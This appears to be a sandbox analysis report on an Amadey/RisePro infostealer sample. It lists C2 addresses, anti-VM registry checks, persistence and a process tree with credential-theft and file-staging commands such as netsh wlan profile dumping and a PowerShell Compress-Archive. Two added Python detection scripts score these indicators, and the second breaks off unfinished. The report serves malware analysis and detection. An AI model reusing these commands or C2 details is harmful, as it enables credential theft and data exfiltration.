Analysis
max time kernel: 150s
max time network: 149s
platform: windows11-21h2_x64
resource: win11-20240419-en
resource tags: arch:x64 arch:x86 image:win11-20240419-en locale:en-us os:windows11-21h2-x64 system
submitted: 05/05/2024, 22:59 UTC
Behavioral task: behavioral1
Sample: c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
Resource: win10v2004-20240419-en
General
Target: c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
Size: 1.6MB
MD5: b6be8ac990a242fb267ad389be0e9f80
SHA1: b653d64cdd79b1e72240090ea8be0d2fe6626cda
SHA256: c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585
SHA512: d5c2a9adaee0bb79e2d025f6003fdd846b1c3be48990ec3422b8c6c06baea2c7a989b8bd8cb3ee4b95235e14ede84771bf46b6b883998edbde6cbe8c58323015
SSDEEP: 24576:k6vpDCULtpzNh6vaS3IpKu7yuHqmbucbqAcaFhv/M6qSQzRt9B1OeAP4oKx3QgSX:k6vhCUL3zNUyYjcLrt3cRHBaIQ8QWw
Malware Config
Extracted
Family: amadey
Version: 4.20
C2: http://193.233.132.139
install_dir: 5454e6f062
install_file: explorta.exe
strings_key: c7a869c5ba1d72480093ec207994e2bf
url_paths: /sev56rkm/index.php
Extracted
Family: amadey
Version: 4.18
C2: http://193.233.132.56
install_dir: 09fd851a4f
install_file: explorha.exe
strings_key: 443351145ece4966ded809641c77cfa8
url_paths: /Pneh2sXQk0/index.php
Extracted
Family: risepro
C2: 147.45.47.93:58709
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 46292a4ec2.exe
-
Blocklisted process makes network request 2 IoCs
flow pid Process
36 4584 rundll32.exe
37 3812 rundll32.exe
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 46292a4ec2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 46292a4ec2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe
-
Executes dropped EXE 5 IoCs
pid Process
4640 explorta.exe
3516 amert.exe
2068 explorha.exe
1592 46292a4ec2.exe
2192 1e69eaa0ab.exe
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description ioc Process
Key opened \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Wine amert.exe
Key opened \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Wine explorha.exe
-
Loads dropped DLL 3 IoCs
pid Process
1884 rundll32.exe
4584 rundll32.exe
3812 rundll32.exe
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 31 IoCs
Themida is a commercial software-protection (packing) system; the themida yara rule matched in the memory of PIDs 2740, 4640 and 1592 and on two dropped files.
resource yara_rule
behavioral2/memory/2740-0-0x0000000000710000-0x0000000000C08000-memory.dmp themida
behavioral2/memory/2740-3-0x0000000000710000-0x0000000000C08000-memory.dmp themida
behavioral2/memory/2740-1-0x0000000000710000-0x0000000000C08000-memory.dmp themida
behavioral2/memory/2740-7-0x0000000000710000-0x0000000000C08000-memory.dmp themida
behavioral2/memory/2740-5-0x0000000000710000-0x0000000000C08000-memory.dmp themida
behavioral2/memory/2740-4-0x0000000000710000-0x0000000000C08000-memory.dmp themida
behavioral2/memory/2740-2-0x0000000000710000-0x0000000000C08000-memory.dmp themida
behavioral2/memory/2740-6-0x0000000000710000-0x0000000000C08000-memory.dmp themida
behavioral2/files/0x001900000002ab49-13.dat themida
behavioral2/memory/2740-20-0x0000000000710000-0x0000000000C08000-memory.dmp themida
behavioral2/memory/4640-21-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/memory/4640-25-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/memory/4640-27-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/memory/4640-26-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/memory/4640-24-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/memory/4640-23-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/memory/4640-22-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/memory/4640-28-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/files/0x0002000000025dae-66.dat themida
behavioral2/memory/4640-80-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/memory/1592-81-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
behavioral2/memory/1592-84-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
behavioral2/memory/1592-85-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
behavioral2/memory/1592-82-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
behavioral2/memory/1592-83-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
behavioral2/memory/1592-86-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
behavioral2/memory/1592-88-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
behavioral2/memory/1592-87-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
behavioral2/memory/1592-89-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
behavioral2/memory/4640-152-0x0000000000E60000-0x0000000001358000-memory.dmp themida
behavioral2/memory/1592-159-0x0000000000BA0000-0x0000000001241000-memory.dmp themida
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Microsoft\Windows\CurrentVersion\Run\46292a4ec2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\46292a4ec2.exe" explorta.exe
Set value (str) \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Microsoft\Windows\CurrentVersion\Run\1e69eaa0ab.exe = "C:\\Users\\Admin\\1000021002\\1e69eaa0ab.exe" explorta.exe
-
Checks whether UAC is enabled 3 IoCs
description ioc Process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorta.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 46292a4ec2.exe
-
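The registry signatures above (VirtualBox ACPI table, BIOS version strings, Wine key, EnableLUA) are individually weak, but a process that touches several of them in one run is a strong sandbox-evasion indicator. The script below is an added example, not part of the sandbox's logic: it parses the report's own "Key opened" / "Key value queried" rows, classifies each key, and flags a process once it hits at least two distinct evasion categories. The chrome.exe rows from "Enumerates system info in registry" further down are included as a benign control. The category patterns, the threshold, and the generalisation of the VirtualBox check to the FADT and RSDT tables are the author's assumptions.

```python
"""Score each process by the sandbox-evasion registry keys it touched, using
the report's own 'Key opened' / 'Key value queried' rows as input.
Added example: rows are copied from the signatures on this page; the
classification and the threshold are the author's, not the sandbox's logic."""
import re
from collections import defaultdict

SAMPLE = "c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe"

# Rows from the VirtualBox / BIOS / Wine / UAC signatures above; the last three
# (chrome.exe, from 'Enumerates system info in registry') are a benign control.
REPORT_ROWS = r"""
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ %s
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 46292a4ec2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 46292a4ec2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion %s
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion %s
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 46292a4ec2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe
Key opened \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Wine amert.exe
Key opened \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Wine explorha.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA %s
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorta.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 46292a4ec2.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe
""" % ((SAMPLE,) * 4)

# Evasion categories (counted toward the verdict).  Assumption: the VirtualBox
# check is generalised to the FADT and RSDT tables, which VirtualBox tags alike.
EVASION = {
    "vbox_acpi":    re.compile(r"\\HARDWARE\\ACPI\\(?:DSDT|FADT|RSDT)\\VBOX__", re.I),
    "bios_version": re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(?:System|Video)BiosVersion$", re.I),
    "wine":         re.compile(r"\\Software\\Wine$", re.I),
}
# Context-only categories: reported for the analyst, not counted.
CONTEXT = {
    "uac_policy": re.compile(r"\\Policies\\System\\EnableLUA$", re.I),
    "sysinfo":    re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\BIOS(?:\\|$)", re.I),
}
ROW = re.compile(r"^(Key opened|Key value queried)\s+(\\REGISTRY\\\S+)\s+(\S+)$")


def classify_key(path):
    """Return (kind, name) for a registry path: evasion, context or other."""
    for name, rx in EVASION.items():
        if rx.search(path):
            return "evasion", name
    for name, rx in CONTEXT.items():
        if rx.search(path):
            return "context", name
    return "other", path


def score_processes(rows):
    """Map process name -> {'evasion': set, 'context': set, 'other': set}."""
    per_proc = defaultdict(lambda: {"evasion": set(), "context": set(), "other": set()})
    for line in rows.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        _, path, proc = m.groups()
        kind, name = classify_key(path)
        per_proc[proc][kind].add(name)
    return dict(per_proc)


def flagged_processes(rows, min_categories=2):
    """Processes that hit at least min_categories distinct evasion categories."""
    return sorted(p for p, c in score_processes(rows).items()
                  if len(c["evasion"]) >= min_categories)


if __name__ == "__main__":
    for proc, cats in sorted(score_processes(REPORT_ROWS).items()):
        print(proc, sorted(cats["evasion"]), sorted(cats["context"]))
    print("flagged:", flagged_processes(REPORT_ROWS))
```

With the threshold at two categories all five dropped executables are flagged and chrome.exe is not; raising it to three isolates amert.exe and explorha.exe, the two that also probe for Wine. The same function works unchanged on Sysmon Event ID 12/13 data once the TargetObject and Image fields are joined into the report's row layout.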
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0002000000025db5-94.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF chrome.exe
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF chrome.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process
3516 amert.exe
2068 explorha.exe
-
Drops file in Windows directory 3 IoCs
description ioc Process
File created C:\Windows\Tasks\explorha.job amert.exe
File opened for modification C:\Windows\SystemTemp chrome.exe
File created C:\Windows\Tasks\explorta.job c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
-
Command and Scripting Interpreter: PowerShell 1 IoCs
pid Process
2176 powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe
-
Modifies data under HKEY_USERS 2 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133594236047360723" chrome.exe
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process (consecutive identical rows collapsed; ×N = repeat count)
3516 amert.exe ×2
2068 explorha.exe ×2
5000 chrome.exe ×2
4584 rundll32.exe ×10
2176 powershell.exe ×3
392 chrome.exe ×4
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process
5000 chrome.exe
5000 chrome.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process (consecutive rows collapsed; ×N = row count)
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (alternating) 5000 chrome.exe ×22
Token: SeDebugPrivilege 2176 powershell.exe ×1
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (alternating, ending on SeShutdownPrivilege) 5000 chrome.exe ×41
-
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process (consecutive identical rows collapsed; ×N = repeat count)
2740 c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe ×1
2192 1e69eaa0ab.exe ×3
5000 chrome.exe ×26
2192 1e69eaa0ab.exe ×1
5000 chrome.exe ×1
2192 1e69eaa0ab.exe ×32
-
Suspicious use of SendNotifyMessage 48 IoCs
pid Process (consecutive identical rows collapsed; ×N = repeat count)
2192 1e69eaa0ab.exe ×3
5000 chrome.exe ×12
2192 1e69eaa0ab.exe ×33
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target (consecutive identical rows collapsed; ×N = repeat count)
PID 2740 wrote to memory of 4640 2740 c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe 81 ×3
PID 4640 wrote to memory of 1140 4640 explorta.exe 82 ×3
PID 4640 wrote to memory of 3516 4640 explorta.exe 83 ×3
PID 3516 wrote to memory of 2068 3516 amert.exe 84 ×3
PID 4640 wrote to memory of 1592 4640 explorta.exe 85 ×3
PID 4640 wrote to memory of 2192 4640 explorta.exe 86 ×3
PID 2192 wrote to memory of 5000 2192 1e69eaa0ab.exe 87 ×2
PID 5000 wrote to memory of 3480 5000 chrome.exe 90 ×2
PID 5000 wrote to memory of 4572 5000 chrome.exe 91 ×30
PID 5000 wrote to memory of 1996 5000 chrome.exe 92 ×2
PID 5000 wrote to memory of 1520 5000 chrome.exe 93 ×10
Processes
-
C:\Users\Admin\AppData\Local\Temp\c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe
"C:\Users\Admin\AppData\Local\Temp\c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe" (level 1)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe" (level 2)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe" (level 3)
PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
"C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe" (level 3)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe" (level 4)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2068 -
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main (level 5)
- Loads dropped DLL
PID:1884 -
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main (level 6)
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4584 -
C:\Windows\system32\netsh.exe
netsh wlan show profiles (level 7)
PID:2556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\917890216844_Desktop.zip' -CompressionLevel Optimal (level 7)
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main (level 5)
- Blocklisted process makes network request
- Loads dropped DLL
PID:3812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000020001\46292a4ec2.exe
"C:\Users\Admin\AppData\Local\Temp\1000020001\46292a4ec2.exe" (level 3)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1592
-
-
C:\Users\Admin\1000021002\1e69eaa0ab.exe
"C:\Users\Admin\1000021002\1e69eaa0ab.exe" (level 3)
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account (level 4)
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0x84,0x108,0x7ffb2abccc40,0x7ffb2abccc4c,0x7ffb2abccc58 (level 5)
PID:3480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1840,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1836 /prefetch:2 (level 5)
PID:4572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2120 /prefetch:3 (level 5)
PID:1996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2576 /prefetch:8 (level 5)
PID:1520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3124 /prefetch:1 (level 5)
PID:2244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3208 /prefetch:1 (level 5)
PID:1272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4536,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4552 /prefetch:8 (level 5)
PID:4984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4464,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4636 /prefetch:8 (level 5)
PID:4840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4580,i,11203653675768585821,3729495797243932421,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4932 /prefetch:8 (level 5)
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:392
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe" (level 1)
PID:4784
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc (level 1)
PID:1216
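The process tree above reads as a chain of post-infection behaviours rather than a single bad process: rundll32.exe loading cred64.dll and clip64.dll from AppData\Roaming by their Main export, netsh wlan show profiles and a PowerShell Compress-Archive into a Temp zip spawned under one of those rundll32 instances, payloads executed from ten-digit subdirectories, and Chrome launched against an account page by a dropped executable. The script below is an added example, not the sandbox's signatures: the process records are transcribed from the tree (parent PIDs from the nesting and the WriteProcessMemory rows; Chrome helper processes and the self-spawned explorta.exe omitted), and the five rules, their names, the parent-image allowlists and the assumption that ten-digit directory names are a stable pattern are the author's.

```python
"""Rule-based triage of the process tree above.  Added example: the records
are transcribed from the Processes section; the rules and their names are the
author's own, not the sandbox's signatures."""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str      # image file name only
    cmdline: str


SAMPLE = "c073b8300cba4a8dea6fa0c9ec1c087b5992982854ab66411da4d966da8be585.exe"
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
RUNDLL = r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\%s, Main'

TREE = [
    Proc(2740, 0,    SAMPLE,           '"%s\\%s"' % (TEMP, SAMPLE)),
    Proc(4640, 2740, "explorta.exe",   '"%s\\5454e6f062\\explorta.exe"' % TEMP),
    Proc(3516, 4640, "amert.exe",      '"%s\\1000019001\\amert.exe"' % TEMP),
    Proc(2068, 3516, "explorha.exe",   '"%s\\09fd851a4f\\explorha.exe"' % TEMP),
    Proc(1884, 2068, "rundll32.exe",   RUNDLL % "cred64.dll"),
    Proc(4584, 1884, "rundll32.exe",   RUNDLL % "cred64.dll"),
    Proc(2556, 4584, "netsh.exe",      "netsh wlan show profiles"),
    Proc(2176, 4584, "powershell.exe",
         "powershell -Command Compress-Archive -Path '%s\\_Files_\\' "
         "-DestinationPath '%s\\917890216844_Desktop.zip' -CompressionLevel Optimal" % (TEMP, TEMP)),
    Proc(3812, 2068, "rundll32.exe",   RUNDLL % "clip64.dll"),
    Proc(1592, 4640, "46292a4ec2.exe", '"%s\\1000020001\\46292a4ec2.exe"' % TEMP),
    Proc(2192, 4640, "1e69eaa0ab.exe", r'"C:\Users\Admin\1000021002\1e69eaa0ab.exe"'),
    Proc(5000, 2192, "chrome.exe",
         r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account'),
]

# Author's patterns (assumptions, not sandbox rules).
RE_APPDATA_DLL = re.compile(r'\\AppData\\(?:Roaming|Local)\\[^"\s]+\.dll\s*,\s*\w+', re.I)
R_NUMERIC_DIR = re.compile(r'\\(?:Temp|Users\\[^\\]+)\\\d{10}\\[^\\"]+\.exe', re.I)
RE_TEMP_ZIP = re.compile(r"Compress-Archive.*-DestinationPath\s+'?[^']*\\Temp\\[^']*\.zip", re.I)
SHELL_PARENTS = {"cmd.exe", "explorer.exe", "powershell.exe"}   # where netsh is expected from
BROWSER_PARENTS = {"explorer.exe", "chrome.exe"}                # where chrome is expected from

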